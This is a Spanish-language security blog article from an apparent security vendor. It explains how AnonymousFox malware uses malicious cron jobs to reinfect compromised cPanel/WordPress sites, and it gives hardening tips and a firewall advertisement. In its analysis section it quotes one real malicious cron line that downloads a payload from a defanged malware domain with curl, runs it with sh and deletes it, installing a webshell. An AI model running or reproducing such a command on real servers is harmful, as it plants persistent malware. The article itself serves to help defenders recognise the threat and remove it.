Nueva ola de AnonymousFox Cron Jobs – 2022

Cron Jobs

Recientemente se notaron una nueva ola de Cron Jobs maliciosos asociados con el notorio malware AnonymousFox. Los Cron Jobs están diseñados específicamente para volver a infectar los sitios web de las víctimas y hacer que la eliminación de la infección sea más engorrosa y lenta.

En este artículo, investigaremos uno de estos Cron Jobs maliciosos, describiremos qué hace y cómo puede reconocerlos y eliminarlos en su sitio web.

¿Qué es un Cron Job?

En primer lugar, comencemos con lo básico. Un Cron Job es esencialmente una tarea programada para ejecutarse en un entorno Linux, que son casi todos los servidores. Los administradores de servidores utilizan con frecuencia Cron Jobs para realizar tareas como actualizaciones de software y ejecución de copias de seguridad.

Sin embargo, los atacantes pueden abusar de esta misma funcionalidad de tarea programada para indicarle al sistema que descargue periódicamente una carga útil maliciosa de un servidor de terceros, como exploraremos a continuación.

Abuso de reinfección

En los últimos años, el malware AnonymousFox ha implementado una serie de técnicas diferentes para dificultar su eliminación. Un ejemplo de ello son los procesos maliciosos que se ejecutan en el servidor y reinfectan constantemente los archivos de carga útil hasta que sean eliminados.

Otro ejemplo es el malware molesto .htaccess (no confundir el archivo .htaccess con el malware en si), que prohíbe la ejecución de scripts PHP que no sean los maliciosos que permiten específicamente.

Es muy común que miles de estos archivos se inyecten en el entorno de la víctima. No solo interfieren con el funcionamiento normal del sitio web (por ejemplo, impidiendo el acceso a su panel de administración de WordPress), sino que pueden dificultar mucho la ejecución de herramientas de seguridad (como complementos) para limpiar la infección.

Se agregan a la lista Cron Jobs maliciosos, que se ejecutan de forma subrepticia en segundo plano y reinfectan el entorno junto con scripts PHP maliciosos que reinfectan los Cron Jobs programados de la víctima.

El comportamiento no es diferente al malware criptominero que combina diferentes métodos de reinfección persistente.

Análisis del Cron Job

Echemos un vistazo a uno de los Cron Jobs maliciosos que se han identificado.

*/10 * * * * curl -so gojj hxxp://golang666[.]xyz/css[.]index && /bin/sh gojj /home/[REDACTED]/public_html/[REDACTED] && rm -f gojj

En este ejemplo, el Cron Job usa cURL para obtener contenido de un dominio de malware. El contenido en cuestión es un webshell de AnonymousFox que se extrae en el siguiente archivo: ./css/index.php

Sin eliminar el Cron Job, el entorno se volverá a infectar automáticamente en un período de tiempo muy corto. Si está lidiando con un truco de este tipo, asegúrese de verificar su lista de Cron Jobs dentro de su cPanel antes de intentar eliminar la infección de su sitio web.

Los atacantes intercambian sus dominios de Cron Jobs con bastante frecuencia, y cuando se llega a investigar la carga útil, a menudo ya se ha eliminado.

Existen varios Cron Jobs maliciosos, pero todos tienen el mismo propósito: reinfectar los entornos de las víctimas y dificultar el proceso de eliminación de malware.

En conclusión

El malware AnonymousFox es uno de los tipos de infecciones más comunes que se ven. Las infecciones son agresivas y persistentes, y si no se toman las medidas correctas, es seguro que regresen.

Asegúrese de hacer lo siguiente si administra un entorno WHM:

  • Habilite la protección de enlaces simbólicos en su configuración global de Apache
  • Deshabilitar el restablecimiento de contraseña por correo electrónico para cuentas de cPanel
  • Proteja sus páginas de administración públicas

Si necesita de servicios para evitar infecciones maliciosas en su entorno, consulte sobre nuestro firewall para ayudar a proteger su sitio web de los ataques https://www.sisbolivia.com/store/seguridad-en-internet

Servicios de seguridad de la información, Contamos con varios

Información de Contacto